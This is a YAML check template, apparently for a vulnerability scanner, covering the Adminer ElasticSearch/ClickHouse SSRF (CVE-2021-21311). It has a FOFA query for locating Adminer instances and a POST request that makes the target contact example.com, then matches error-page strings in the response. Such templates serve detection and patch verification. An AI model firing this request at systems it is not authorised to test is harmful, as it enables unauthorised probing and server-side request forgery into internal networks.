product: Adminer
vName: Adminer ElasticSearch 和 ClickHouse 错误页面SSRF
type: 服务端请求伪造
vID: [ ]
level: 3
vDesc: Adminer是一个PHP编写的开源数据库管理工具，支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。在其4.0.0到4.7.9版本之间，连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞（SSRF）。
version: ''
note: ''
search:
  FOFA: app="Adminer"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/Web应用漏洞/Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞 CVE-2021-21311.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: true
      path: /
      data: auth%5Bdriver%5D=elastic&auth%5Bserver%5D=example.com&auth%5Busername%5D=root&auth%5Bpassword%5D=&auth%5Bdb%5D=
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - '?xml version='
              - '400 - Bad Request'
              - '!DOCTYPE html PUBLIC'
            logic: and